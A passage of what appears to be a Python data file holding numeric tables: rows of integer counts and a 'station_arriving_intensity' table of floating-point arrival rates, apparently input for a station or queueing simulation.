(4, 4, 3, 4, 2, 2, 1, 2, 3, 1, 0, 0, 0, 2, 3, 2, 1, 2, 2, 1, 0, 1, 1, 1, 0, 0), # 73
(2, 3, 1, 3, 3, 2, 2, 0, 3, 0, 1, 0, 0, 1, 5, 1, 2, 2, 1, 1, 0, 0, 0, 0, 0, 0), # 74
(3, 5, 1, 4, 3, 1, 2, 1, 1, 0, 0, 1, 0, 2, 3, 2, 3, 4, 5, 0, 1, 1, 0, 0, 0, 0), # 75
(4, 2, 0, 4, 1, 1, 3, 3, 4, 0, 0, 1, 0, 9, 3, 1, 3, 3, 1, 3, 1, 0, 2, 1, 0, 0), # 76
(3, 5, 4, 2, 6, 0, 3, 0, 3, 0, 1, 0, 0, 3, 5, 2, 1, 4, 2, 2, 1, 1, 1, 1, 1, 0), # 77
(3, 1, 3, 4, 3, 1, 0, 2, 1, 1, 1, 0, 0, 2, 3, 5, 2, 3, 1, 2, 1, 3, 2, 1, 1, 0), # 78
(7, 5, 5, 4, 4, 1, 2, 0, 2, 0, 1, 0, 0, 5, 7, 7, 2, 3, 2, 2, 0, 1, 1, 0, 0, 0), # 79
(3, 7, 5, 3, 2, 1, 0, 1, 0, 0, 0, 0, 0, 3, 3, 4, 0, 1, 3, 3, 1, 3, 1, 0, 0, 0), # 80
(7, 2, 4, 8, 2, 4, 1, 2, 1, 1, 1, 1, 0, 3, 5, 3, 2, 6, 1, 2, 1, 3, 0, 1, 0, 0), # 81
(8, 6, 4, 3, 4, 0, 3, 3, 3, 0, 0, 0, 0, 4, 4, 1, 2, 1, 0, 2, 2, 2, 1, 1, 0, 0), # 82
(4, 2, 2, 4, 1, 1, 3, 1, 0, 3, 2, 1, 0, 4, 7, 3, 0, 4, 1, 1, 0, 1, 3, 0, 1, 0), # 83
(3, 5, 1, 5, 4, 3, 2, 0, 2, 1, 1, 0, 0, 7, 5, 3, 5, 2, 0, 2, 0, 1, 2, 0, 0, 0), # 84
(2, 1, 3, 4, 1, 0, 1, 1, 0, 1, 1, 0, 0, 2, 5, 3, 2, 2, 1, 1, 1, 2, 1, 1, 0, 0), # 85
(4, 3, 3, 5, 7, 0, 1, 1, 3, 2, 0, 0, 0, 3, 5, 3, 2, 3, 2, 1, 1, 2, 0, 0, 0, 0), # 86
(4, 1, 3, 2, 4, 0, 1, 0, 1, 0, 1, 0, 0, 3, 4, 1, 3, 2, 3, 2, 1, 1, 2, 2, 0, 0), # 87
(2, 4, 5, 2, 2, 0, 1, 0, 0, 0, 1, 0, 0, 7, 2, 0, 4, 3, 0, 1, 0, 0, 0, 2, 0, 0), # 88
(7, 1, 5, 4, 6, 1, 3, 2, 2, 0, 0, 0, 0, 0, 5, 1, 2, 0, 0, 3, 1, 2, 0, 1, 0, 0), # 89
(5, 3, 8, 6, 4, 1, 1, 1, 1, 1, 1, 0, 0, 2, 2, 2, 3, 2, 3, 3, 0, 0, 0, 0, 0, 0), # 90
(6, 5, 5, 6, 1, 2, 0, 1, 2, 0, 0, 1, 0, 5, 4, 4, 0, 1, 2, 0, 0, 3, 2, 0, 0, 0), # 91
(4, 6, 3, 2, 3, 0, 2, 0, 2, 0, 0, 0, 0, 3, 3, 2, 0, 6, 2, 1, 0, 1, 1, 1, 0, 0), # 92
(6, 4, 3, 3, 2, 0, 0, 0, 1, 2, 0, 1, 0, 3, 7, 0, 2, 3, 4, 3, 0, 4, 2, 1, 1, 0), # 93
(3, 1, 2, 3, 1, 1, 2, 1, 1, 0, 1, 0, 0, 6, 3, 2, 2, 5, 0, 0, 0, 2, 0, 1, 0, 0), # 94
(5, 1, 5, 4, 6, 2, 0, 0, 1, 1, 0, 0, 0, 3, 2, 3, 6, 2, 0, 0, 0, 0, 1, 0, 0, 0), # 95
(4, 3, 2, 4, 6, 2, 0, 2, 3, 1, 1, 0, 0, 4, 1, 1, 1, 4, 2, 0, 1, 0, 0, 0, 0, 0), # 96
(3, 3, 7, 2, 3, 1, 2, 1, 2, 1, 0, 0, 0, 4, 2, 4, 1, 3, 0, 1, 0, 0, 1, 0, 0, 0), # 97
(5, 5, 1, 5, 3, 5, 1, 2, 0, 2, 1, 0, 0, 3, 4, 1, 3, 2, 1, 3, 1, 3, 0, 0, 0, 0), # 98
(3, 3, 3, 3, 2, 2, 1, 1, 1, 2, 1, 1, 0, 1, 2, 2, 2, 3, 2, 2, 1, 3, 2, 1, 1, 0), # 99
(6, 4, 2, 1, 2, 4, 2, 4, 0, 0, 2, 0, 0, 7, 5, 4, 2, 3, 0, 1, 1, 3, 0, 0, 1, 0), # 100
(5, 2, 1, 2, 5, 1, 1, 2, 3, 1, 1, 1, 0, 1, 3, 2, 3, 2, 3, 3, 0, 2, 0, 0, 1, 0), # 101
(5, 1, 6, 4, 6, 0, 1, 4, 2, 0, 0, 1, 0, 2, 0, 2, 6, 4, 1, 2, 2, 0, 4, 0, 0, 0), # 102
(0, 2, 1, 6, 3, 1, 0, 0, 1, 0, 0, 0, 0, 5, 3, 2, 0, 3, 2, 0, 0, 1, 1, 0, 0, 0), # 103
(2, 1, 2, 5, 2, 0, 1, 2, 0, 1, 0, 0, 0, 0, 4, 1, 2, 2, 1, 3, 0, 2, 3, 1, 0, 0), # 104
(2, 7, 3, 6, 1, 2, 1, 4, 3, 1, 0, 0, 0, 2, 3, 3, 1, 6, 5, 2, 2, 1, 1, 2, 0, 0), # 105
(7, 4, 3, 5, 4, 2, 0, 0, 2, 0, 0, 0, 0, 5, 3, 1, 2, 5, 0, 3, 1, 3, 0, 2, 0, 0), # 106
(4, 4, 6, 4, 0, 0, 2, 3, 1, 0, 0, 0, 0, 3, 7, 1, 2, 2, 2, 0, 3, 0, 1, 1, 0, 0), # 107
(2, 2, 3, 1, 8, 1, 1, 1, 1, 0, 0, 1, 0, 5, 3, 1, 1, 6, 0, 1, 1, 3, 1, 1, 0, 0), # 108
(4, 4, 2, 3, 3, 1, 1, 0, 0, 1, 0, 1, 0, 7, 5, 1, 0, 1, 0, 2, 1, 2, 1, 1, 1, 0), # 109
(5, 4, 1, 5, 2, 0, 0, 2, 1, 0, 0, 0, 0, 6, 1, 3, 0, 2, 2, 1, 0, 0, 0, 1, 0, 0), # 110
(8, 1, 2, 1, 3, 1, 1, 0, 2, 0, 1, 0, 0, 3, 3, 2, 3, 4, 1, 0, 0, 2, 2, 0, 0, 0), # 111
(4, 4, 5, 1, 3, 1, 3, 1, 0, 0, 1, 0, 0, 4, 6, 1, 3, 6, 2, 1, 0, 1, 1, 0, 0, 0), # 112
(3, 2, 2, 3, 3, 2, 1, 2, 2, 0, 1, 0, 0, 3, 5, 1, 1, 3, 1, 3, 1, 1, 2, 1, 1, 0), # 113
(2, 3, 3, 2, 2, 0, 1, 0, 3, 2, 0, 0, 0, 2, 3, 2, 1, 1, 1, 3, 2, 2, 0, 0, 0, 0), # 114
(2, 4, 2, 4, 2, 4, 2, 3, 1, 1, 1, 0, 0, 3, 4, 2, 0, 1, 1, 0, 0, 0, 2, 0, 0, 0), # 115
(4, 1, 5, 3, 2, 3, 4, 2, 3, 0, 1, 1, 0, 6, 4, 2, 2, 1, 1, 0, 1, 2, 0, 0, 2, 0), # 116
(3, 4, 5, 3, 3, 1, 3, 0, 3, 1, 2, 0, 0, 3, 3, 1, 1, 1, 2, 2, 1, 1, 0, 1, 0, 0), # 117
(3, 3, 0, 1, 1, 1, 2, 0, 4, 1, 1, 1, 0, 5, 2, 7, 1, 1, 2, 0, 2, 4, 0, 1, 0, 0), # 118
(3, 3, 0, 2, 4, 1, 2, 1, 3, 0, 0, 1, 0, 4, 4, 0, 2, 1, 1, 0, 1, 0, 0, 1, 0, 0), # 119
(2, 1, 3, 7, 4, 2, 1, 1, 2, 3, 0, 0, 0, 3, 2, 4, 1, 2, 1, 2, 0, 3, 0, 1, 0, 0), # 120
(5, 4, 2, 3, 2, 1, 1, 3, 2, 0, 1, 0, 0, 4, 5, 2, 2, 3, 1, 2, 0, 0, 1, 0, 1, 0), # 121
(2, 3, 3, 2, 0, 2, 0, 0, 3, 1, 0, 1, 0, 3, 5, 1, 1, 0, 1, 2, 1, 1, 1, 0, 1, 0), # 122
(5, 2, 3, 4, 4, 0, 1, 1, 2, 0, 0, 0, 0, 1, 2, 3, 1, 1, 0, 0, 3, 2, 1, 0, 0, 0), # 123
(3, 2, 3, 2, 1, 2, 3, 3, 3, 2, 0, 1, 0, 6, 4, 1, 1, 0, 0, 1, 3, 3, 0, 0, 0, 0), # 124
(3, 2, 3, 3, 1, 0, 2, 2, 2, 0, 0, 0, 0, 4, 6, 1, 2, 6, 3, 1, 1, 1, 1, 1, 0, 0), # 125
(1, 4, 4, 5, 6, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 2, 7, 2, 2, 0, 1, 1, 0, 0, 0), # 126
(4, 1, 4, 1, 2, 0, 2, 0, 1, 0, 3, 0, 0, 2, 3, 5, 0, 3, 2, 0, 0, 1, 1, 0, 0, 0), # 127
(3, 2, 3, 2, 1, 1, 1, 0, 1, 0, 0, 0, 0, 2, 2, 1, 1, 4, 1, 1, 2, 1, 4, 2, 0, 0), # 128
(7, 0, 4, 5, 1, 2, 0, 1, 1, 0, 0, 0, 0, 3, 1, 2, 1, 1, 1, 0, 2, 0, 0, 1, 1, 0), # 129
(1, 1, 2, 2, 5, 3, 1, 1, 2, 1, 0, 0, 0, 5, 2, 1, 0, 5, 1, 1, 3, 1, 2, 1, 1, 0), # 130
(5, 2, 8, 1, 1, 2, 0, 1, 0, 0, 1, 1, 0, 3, 5, 1, 4, 6, 1, 4, 0, 1, 0, 0, 0, 0), # 131
(2, 2, 3, 4, 3, 0, 1, 1, 3, 2, 1, 0, 0, 4, 5, 2, 0, 1, 2, 2, 0, 0, 0, 0, 0, 0), # 132
(4, 4, 2, 4, 1, 1, 0, 1, 0, 0, 1, 0, 0, 2, 2, 2, 1, 3, 0, 1, 1, 0, 1, 2, 1, 0), # 133
(2, 2, 1, 4, 6, 0, 0, 2, 2, 1, 3, 0, 0, 4, 2, 1, 1, 3, 1, 0, 0, 2, 0, 0, 0, 0), # 134
(1, 2, 3, 3, 5, 0, 1, 2, 0, 2, 1, 0, 0, 2, 3, 4, 3, 1, 0, 2, 1, 3, 1, 1, 0, 0), # 135
(6, 4, 6, 2, 3, 3, 1, 1, 1, 1, 0, 0, 0, 4, 4, 4, 1, 3, 2, 2, 2, 3, 4, 0, 0, 0), # 136
(5, 1, 3, 3, 3, 2, 1, 1, 3, 0, 1, 1, 0, 5, 4, 2, 2, 2, 5, 3, 1, 1, 1, 2, 1, 0), # 137
(6, 1, 4, 1, 3, 4, 2, 2, 0, 2, 0, 0, 0, 3, 3, 0, 0, 2, 1, 0, 0, 0, 1, 0, 0, 0), # 138
(3, 3, 3, 3, 2, 4, 0, 0, 2, 0, 1, 0, 0, 3, 1, 1, 1, 3, 1, 0, 1, 1, 2, 0, 0, 0), # 139
(6, 6, 6, 5, 5, 0, 1, 1, 1, 0, 0, 0, 0, 1, 3, 2, 2, 4, 4, 1, 0, 2, 1, 0, 0, 0), # 140
(4, 4, 2, 4, 3, 0, 1, 2, 1, 1, 0, 1, 0, 3, 5, 1, 0, 8, 1, 2, 0, 1, 1, 1, 0, 0), # 141
(2, 3, 2, 3, 6, 2, 1, 1, 1, 1, 0, 1, 0, 6, 2, 2, 2, 2, 6, 2, 0, 4, 2, 2, 0, 0), # 142
(2, 2, 2, 4, 3, 1, 1, 1, 1, 0, 2, 0, 0, 5, 3, 3, 0, 1, 1, 2, 1, 3, 2, 1, 0, 0), # 143
(3, 0, 2, 4, 4, 1, 3, 1, 0, 0, 0, 1, 0, 4, 2, 0, 1, 1, 1, 1, 2, 0, 1, 0, 0, 0), # 144
(4, 1, 3, 1, 5, 0, 2, 4, 1, 1, 0, 0, 0, 7, 6, 2, 1, 2, 1, 0, 0, 0, 0, 0, 0, 0), # 145
(4, 4, 3, 3, 3, 3, 0, 1, 1, 0, 0, 0, 0, 5, 0, 2, 0, 2, 1, 2, 0, 1, 2, 0, 0, 0), # 146
(2, 1, 2, 1, 3, 1, 1, 1, 1, 0, 0, 0, 0, 6, 3, 2, 0, 2, 0, 1, 0, 2, 1, 1, 0, 0), # 147
(5, 5, 3, 4, 0, 6, 0, 0, 2, 1, 1, 1, 0, 9, 2, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0), # 148
(3, 5, 6, 4, 6, 2, 0, 3, 3, 0, 0, 1, 0, 3, 1, 4, 0, 5, 1, 2, 0, 2, 1, 4, 0, 0), # 149
(4, 0, 3, 1, 3, 1, 2, 0, 1, 0, 0, 1, 0, 3, 2, 2, 0, 5, 0, 1, 0, 0, 0, 1, 0, 0), # 150
(6, 5, 4, 3, 1, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 8, 0, 0, 3, 0, 0, 4, 0, 0), # 151
(0, 1, 1, 4, 0, 0, 1, 0, 0, 2, 0, 0, 0, 3, 2, 3, 0, 2, 0, 0, 0, 6, 0, 1, 0, 0), # 152
(4, 0, 5, 1, 6, 1, 2, 2, 2, 0, 0, 0, 0, 2, 6, 1, 1, 1, 0, 0, 0, 2, 0, 0, 0, 0), # 153
(4, 1, 3, 2, 1, 1, 0, 1, 2, 1, 0, 1, 0, 4, 3, 1, 1, 2, 1, 0, 2, 1, 0, 2, 1, 0), # 154
(4, 2, 3, 3, 6, 3, 2, 1, 0, 0, 0, 0, 0, 4, 0, 0, 3, 0, 2, 1, 1, 1, 0, 1, 0, 0), # 155
(5, 1, 1, 4, 4, 1, 2, 3, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 1, 1, 0, 1, 0, 0, 0, 0), # 156
(4, 1, 3, 3, 4, 3, 3, 1, 1, 2, 1, 0, 0, 3, 1, 3, 0, 5, 0, 4, 0, 1, 2, 0, 0, 0), # 157
(4, 3, 3, 0, 3, 3, 0, 0, 1, 0, 0, 0, 0, 1, 5, 2, 3, 1, 0, 0, 1, 3, 0, 0, 0, 0), # 158
(4, 4, 2, 3, 1, 3, 1, 1, 1, 1, 0, 0, 0, 3, 3, 4, 1, 2, 5, 0, 3, 0, 0, 0, 0, 0), # 159
(1, 4, 3, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 2, 2, 1, 1, 2, 2, 0, 0, 4, 3, 0, 0, 0), # 160
(4, 1, 2, 2, 2, 1, 1, 1, 0, 1, 0, 0, 0, 4, 0, 3, 3, 3, 0, 1, 1, 1, 1, 0, 0, 0), # 161
(2, 1, 5, 0, 3, 2, 1, 0, 3, 0, 1, 0, 0, 3, 1, 2, 0, 4, 1, 1, 0, 0, 3, 0, 0, 0), # 162
(2, 2, 3, 3, 1, 1, 3, 2, 2, 1, 0, 0, 0, 4, 2, 3, 1, 3, 3, 1, 3, 0, 1, 1, 0, 0), # 163
(0, 2, 1, 2, 5, 1, 0, 2, 1, 2, 0, 0, 0, 4, 0, 2, 0, 3, 2, 0, 0, 2, 0, 1, 0, 0), # 164
(2, 1, 2, 5, 2, 3, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 1, 3, 0, 0, 2, 1, 1, 1, 0), # 165
(3, 1, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 2, 2, 3, 1, 0, 3, 1, 1, 1, 0, 1, 0, 0), # 166
(3, 0, 1, 2, 1, 2, 1, 1, 0, 2, 0, 0, 0, 2, 2, 2, 2, 2, 2, 1, 2, 3, 0, 0, 1, 0), # 167
(1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 7, 0, 3, 3, 2, 0, 3, 0, 0, 1, 0, 0, 0), # 168
(5, 3, 4, 2, 0, 1, 1, 0, 1, 0, 0, 0, 0, 2, 0, 0, 3, 1, 1, 0, 2, 1, 0, 1, 0, 0), # 169
(0, 2, 1, 2, 3, 0, 0, 0, 2, 0, 0, 0, 0, 2, 1, 2, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0), # 170
(5, 5, 2, 3, 1, 1, 0, 1, 0, 0, 0, 0, 0, 2, 4, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0), # 171
(1, 3, 1, 1, 2, 0, 1, 0, 0, 1, 0, 0, 0, 4, 5, 1, 2, 2, 1, 0, 0, 2, 0, 0, 0, 0), # 172
(1, 1, 1, 2, 2, 0, 2, 1, 0, 0, 0, 0, 0, 1, 2, 0, 1, 2, 0, 0, 0, 0, 1, 0, 0, 0), # 173
(3, 2, 2, 1, 1, 2, 1, 1, 1, 0, 0, 0, 0, 4, 2, 3, 1, 2, 3, 0, 1, 0, 0, 0, 0, 0), # 174
(0, 0, 2, 3, 4, 0, 1, 0, 0, 1, 0, 0, 0, 2, 3, 4, 1, 4, 0, 0, 1, 0, 0, 1, 0, 0), # 175
(0, 1, 5, 4, 1, 1, 1, 2, 3, 1, 1, 0, 0, 1, 1, 1, 0, 3, 0, 0, 0, 1, 1, 0, 0, 0), # 176
(1, 2, 3, 3, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 3, 3, 0, 4, 1, 0, 0, 0, 0), # 177
(2, 0, 0, 2, 0, 1, 0, 1, 3, 1, 0, 0, 0, 3, 1, 2, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0), # 178
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 179
)
station_arriving_intensity = (
(2.0083462313487073, 2.2101154238772667, 2.0845132918450027, 2.485867109545373, 2.2218742430438447, 1.2554619728149357, 1.6584142461495661, 1.8612704691917692, 2.436039624867203, 1.583206006208948, 1.6821060655542412, 1.9591660313224695, 2.0335520850313453), # 0
(2.1417308608079897, 2.3560242776579035, 2.222138636532061, 2.6500577013106468, 2.3689961349896946, 1.3383934336170222, 1.7677875765054776, 1.9838054891622834, 2.5968981305331638, 1.68759227691086, 1.7932384543824527, 2.088486664325742, 2.1679166589759418), # 1
(2.2746892035918926, 2.5013540683563917, 2.3592169142189654, 2.813595081865918, 2.5155851894998977, 1.420994045804978, 1.8767274031842818, 2.105850099161768, 2.7571147227510195, 1.7915655100082184, 1.9039292595105253, 2.217293060821222, 2.301745931283876), # 2
(2.406703117258625, 2.645528200774579, 2.4952043477279418, 2.9758305630128294, 2.661064670400761, 1.5029362490340452, 1.9848014566591823, 2.226920462997803, 2.916054064368437, 1.8947130793704723, 2.013739364730953, 2.3450742739721844, 2.4345091225016904), # 3
(2.537254459366393, 2.78797007971431, 2.6295571598812146, 3.136115456553028, 2.804857841518597, 1.5838924829594672, 2.0915774674033836, 2.3465327444779662, 3.073080818233083, 1.9966223588670715, 2.12222965383623, 2.4713193569419056, 2.565675453175927), # 4
(2.6658250874734044, 2.9281031099774353, 2.7617315735010073, 3.2938010742881576, 2.946387966679712, 1.6635351872364859, 2.1966231658900894, 2.464203107409837, 3.227559647192624, 2.0968807223674655, 2.228961010618853, 2.595517362893659, 2.694714143853131), # 5
(2.7918968591378666, 3.0653506963658006, 2.8911838114095465, 3.448238728019861, 3.0850783097104175, 1.7415368015203456, 2.299506282592505, 2.5794477156009954, 3.378855214094726, 2.1950755437411034, 2.333494318871313, 2.7171573449907234, 2.821094415079843), # 6
(2.9149516319179876, 3.1991362436812527, 3.017370096429054, 3.598779729549785, 3.2203521344370216, 1.8175697654662883, 2.399794547983834, 2.691782732859021, 3.526332181787058, 2.290794196857435, 2.4353904623861076, 2.8357283563963716, 2.944285487402608), # 7
(3.034471263371974, 3.32888315672564, 3.1397466513817585, 3.744775390679571, 3.3516327046858345, 1.891306518729556, 2.497055692537279, 2.80072432299149, 3.6693552131172824, 2.38362405558591, 2.5342103249557284, 2.950719450273881, 3.063756581367967), # 8
(3.149937611058034, 3.4540148403008093, 3.2577696990898817, 3.8855770232108675, 3.478343284283164, 1.9624195009653935, 2.590857446726048, 2.9057886498059853, 3.8072889709330697, 2.473152493795977, 2.629514790372671, 3.0616196797865256, 3.178976917522465), # 9
(3.2608325325343728, 3.573954699208606, 3.3708954623756497, 4.020535938945315, 3.5999071370553204, 2.030581151829043, 2.680767541023342, 3.0064918771100846, 3.939498118082086, 2.5589668853570857, 2.7208647424294297, 3.167918098097581, 3.2894157164126443), # 10
(3.3666378853592023, 3.6881261382508828, 3.4785801640612863, 4.149003449684559, 3.7157475268286135, 2.0954639109757474, 2.7663537059023664, 3.102350168711366, 4.065347317411997, 2.6406546041386876, 2.8078210649184996, 3.269103758370324, 3.394542198585045), # 11
(3.466835527090725, 3.795952562229479, 3.580280026969016, 4.270330867230245, 3.825287717429351, 2.156740218060748, 2.8471836718363246, 3.1928796884174084, 4.184201231770472, 2.717803024010229, 2.8899446416323737, 3.3646657137680274, 3.493825584586214), # 12
(3.5609073152871504, 3.896857375946248, 3.6754512739210647, 4.383869503384018, 3.9279509726838406, 2.2140825127392896, 2.9228251692984224, 3.2775966000357926, 4.295424524005173, 2.789999518841162, 2.9667963563635475, 3.4540930174539684, 3.586735094962694), # 13
(3.6483351075066865, 3.9902639842030356, 3.763550127739659, 4.488970669947517, 4.023160556418396, 2.2671632346666137, 2.9928459287618647, 3.3560170673740988, 4.398381856963769, 2.8568314625009337, 3.0379370929045137, 3.536874722591424, 3.6727399502610254), # 14
(3.728600761307542, 4.075595791801687, 3.844032811247017, 4.584985678722394, 4.110339732459323, 2.315654823497965, 3.0568136806998503, 3.4276572542399024, 4.4924378934939275, 2.9178862288589964, 3.1029277350477678, 3.6124998823436685, 3.7513093710277525), # 15
(3.8011861342479203, 4.152276203544053, 3.91635554726537, 4.671265841510286, 4.188911764632933, 2.359229718888584, 3.1142961555855906, 3.4920333244407846, 4.5769572964433145, 2.9727511917847984, 3.161329166585805, 3.680457549873976, 3.8219125778094183), # 16
(3.86557308388603, 4.219728624231979, 3.979974558616941, 4.747162470112845, 4.2582999167655355, 2.3975603604937143, 3.1648610838922844, 3.5486614417843274, 4.651304728659594, 3.021013725147787, 3.2127022713111195, 3.740236778345622, 3.8840187911525663), # 17
(3.921243467780082, 4.27737645866731, 4.034346068123952, 4.8120268763317116, 4.317927452683436, 2.4303191879686015, 3.2080761960931405, 3.5970577700781043, 4.7148448529904385, 3.0622612028174148, 3.2566079330162037, 3.791326620921886, 3.9370972316037385), # 18
(3.9676791434882794, 4.3246431116518975, 4.078926298608631, 4.8652103719685265, 4.3672176362129465, 2.4571786409684835, 3.2435092226613578, 3.6367384731296983, 4.766942332283512, 3.0960809986631315, 3.2926070354935515, 3.8332161307660386, 3.9806171197094784), # 19
(4.0043619685688325, 4.360951987987585, 4.113171472893201, 4.906064268824942, 4.405593731180377, 2.4778111591486076, 3.270727894070145, 3.667219714746687, 4.80696182938648, 3.1220604865543837, 3.32026046253566, 3.8653943610413566, 4.01404767601633), # 20
(4.030773800579946, 4.385726492476223, 4.136537813799888, 4.933939878702595, 4.432479001412036, 2.4918891821642144, 3.289299940792704, 3.6880176587366496, 4.834268007147009, 3.139787040360622, 3.339129097935024, 3.8873503649111174, 4.036858121070831), # 21
(4.046396497079832, 4.398390029919658, 4.148481544150914, 4.948188513403135, 4.44729671073423, 2.499085149670547, 3.29879309330224, 3.698648468907166, 4.848225528412766, 3.148848033951297, 3.348773825484136, 3.898573195538596, 4.048517675419531), # 22
(4.052157345337056, 4.399889437585734, 4.149969272976681, 4.949972325102881, 4.451092822413039, 2.5, 3.2999216009037355, 3.6997975308641977, 4.849970493827161, 3.149916909007773, 3.349983214864696, 3.8999590306355736, 4.05), # 23
(4.056404965213662, 4.399014814814815, 4.149725925925926, 4.949752777777778, 4.453243045445941, 2.5, 3.299301525054467, 3.6982, 4.849736666666667, 3.14926024691358, 3.3498498316498324, 3.8996345679012343, 4.05), # 24
(4.060562892084632, 4.397290809327846, 4.149245541838135, 4.949318415637861, 4.455345978237801, 2.5, 3.298079561042524, 3.6950617283950624, 4.849274691358025, 3.1479675354366714, 3.349585359770545, 3.898994055784179, 4.05), # 25
(4.0646308076192135, 4.394743758573389, 4.148534705075447, 4.948674176954732, 4.457401547368442, 2.5, 3.2962746873234887, 3.6904419753086426, 4.84859049382716, 3.14606028349337, 3.349192193540342, 3.8980462734339287, 4.05), # 26
(4.068608393486655, 4.3914, 4.1476, 4.947825, 4.459409679417686, 2.5, 3.2939058823529415, 3.6844, 4.84769, 3.14356, 3.3486727272727275, 3.8968000000000007, 4.05), # 27
(4.0724953313562, 4.387285871056242, 4.146448010973937, 4.946775823045268, 4.461370300965361, 2.5, 3.2909921245864604, 3.6769950617283955, 4.846579135802469, 3.1404881938728852, 3.3480293552812075, 3.895264014631916, 4.05), # 28
(4.0762913028971, 4.382427709190672, 4.145085322359397, 4.94553158436214, 4.463283338591288, 2.5, 3.2875523924796264, 3.6682864197530862, 4.845263827160494, 3.1368663740283496, 3.3472644718792868, 3.893447096479195, 4.05), # 29
(4.079995989778599, 4.376851851851852, 4.143518518518518, 4.944097222222222, 4.4651487188752945, 2.5, 3.2836056644880176, 3.658333333333333, 4.84375, 3.1327160493827164, 3.3463804713804715, 3.8913580246913577, 4.05), # 30
(4.083609073669943, 4.370584636488341, 4.141754183813443, 4.94247767489712, 4.466966368397204, 2.5, 3.279170919067216, 3.6471950617283952, 4.842043580246914, 3.1280587288523094, 3.3453797480982668, 3.8890055784179247, 4.05), # 31
(4.087130236240382, 4.363652400548697, 4.13979890260631, 4.940677880658437, 4.468736213736839, 2.5, 3.2742671346727996, 3.6349308641975315, 4.840150493827161, 3.1229159213534525, 3.344264696346178, 3.886398536808414, 4.05), # 32
(4.090559159159159, 4.356081481481481, 4.13765925925926, 4.938702777777777, 4.470458181474025, 2.5, 3.2689132897603486, 3.6216000000000004, 4.838076666666667, 3.1173091358024694, 3.3430377104377103, 3.8835456790123453, 4.05), # 33
(4.093895524095524, 4.347898216735254, 4.135341838134431, 4.936557304526749, 4.472132198188587, 2.5, 3.263128362785444, 3.6072617283950614, 4.835828024691359, 3.111259881115684, 3.34170118468637, 3.880455784179241, 4.05), # 34
(4.097139012718723, 4.339128943758573, 4.132853223593965, 4.9342463991769545, 4.473758190460348, 2.5, 3.2569313322036635, 3.5919753086419757, 4.833410493827161, 3.1047896662094194, 3.3402575134056613, 3.8771376314586194, 4.05), # 35
(4.100289306698002, 4.3298, 4.1302, 4.931775, 4.475336084869134, 2.5, 3.250341176470588, 3.5758000000000005, 4.83083, 3.0979200000000002, 3.338709090909091, 3.8736000000000006, 4.05), # 36
(4.10334608770261, 4.319937722908093, 4.127388751714678, 4.92914804526749, 4.476865807994769, 2.5, 3.2433768740417976, 3.558795061728395, 4.828092469135803, 3.09067239140375, 3.337058311510164, 3.869851668952904, 4.05), # 37
(4.1063090374017905, 4.3095684499314135, 4.124426063100137, 4.92637047325103, 4.478347286417076, 2.5, 3.2360574033728717, 3.5410197530864203, 4.825203827160494, 3.0830683493369917, 3.3353075695223846, 3.86590141746685, 4.05), # 38
(4.109177837464794, 4.298718518518519, 4.121318518518519, 4.923447222222222, 4.479780446715881, 2.5, 3.2284017429193903, 3.5225333333333335, 4.822170000000001, 3.0751293827160495, 3.3334592592592593, 3.861758024691358, 4.05), # 39
(4.111952169560865, 4.2874142661179695, 4.118072702331961, 4.920383230452675, 4.481165215471008, 2.5, 3.2204288711369324, 3.503395061728396, 4.818996913580247, 3.066877000457248, 3.3315157750342936, 3.8574302697759495, 4.05), # 40
(4.114631715359251, 4.275682030178326, 4.114695198902607, 4.917183436213993, 4.482501519262281, 2.5, 3.212157766481078, 3.4836641975308646, 4.8156904938271605, 3.058332711476909, 3.329479511160993, 3.852926931870142, 4.05), # 41
(4.1172161565292, 4.263548148148149, 4.111192592592594, 4.9138527777777785, 4.483789284669523, 2.5, 3.2036074074074072, 3.4634, 4.812256666666667, 3.0495180246913582, 3.3273528619528623, 3.848256790123457, 4.05), # 42
(4.119705174739957, 4.251038957475995, 4.1075714677640605, 4.910396193415639, 4.485028438272561, 2.5, 3.1947967723715003, 3.4426617283950622, 4.808701358024692, 3.0404544490169183, 3.3251382217234067, 3.8434286236854143, 4.05), # 43
(4.122098451660771, 4.238180795610425, 4.10383840877915, 4.906818621399178, 4.486218906651218, 2.5, 3.185744839828936, 3.4215086419753096, 4.805030493827161, 3.031163493369913, 3.322837984786133, 3.838451211705533, 4.05), # 44
(4.1243956689608865, 4.2250000000000005, 4.1000000000000005, 4.903125, 4.487360616385319, 2.5, 3.1764705882352944, 3.4000000000000004, 4.80125, 3.021666666666667, 3.3204545454545453, 3.833333333333333, 4.05), # 45
(4.126596508309553, 4.211522908093278, 4.096062825788752, 4.8993202674897125, 4.488453494054687, 2.5, 3.1669929960461554, 3.3781950617283956, 4.797365802469136, 3.0119854778235027, 3.3179902980421496, 3.828083767718336, 4.05), # 46
(4.128700651376014, 4.19777585733882, 4.092033470507545, 4.895409362139918, 4.489497466239147, 2.5, 3.1573310417170988, 3.356153086419753, 4.793383827160494, 3.0021414357567444, 3.3154476368624515, 3.82271129401006, 4.05), # 47
(4.130707779829518, 4.183785185185186, 4.087918518518519, 4.891397222222223, 4.490492459518524, 2.5, 3.1475037037037037, 3.333933333333334, 4.78931, 2.992156049382716, 3.312828956228956, 3.8172246913580246, 4.05), # 48
(4.132617575339315, 4.169577229080932, 4.083724554183814, 4.887288786008231, 4.491438400472643, 2.5, 3.137529960461551, 3.3115950617283954, 4.78515024691358, 2.9820508276177415, 3.3101366504551692, 3.8116327389117517, 4.05), # 49
(4.134429719574647, 4.155178326474624, 4.07945816186557, 4.883088991769547, 4.492335215681326, 2.5, 3.12742879044622, 3.2891975308641976, 4.78091049382716, 2.9718472793781436, 3.307373113854595, 3.8059442158207597, 4.05), # 50
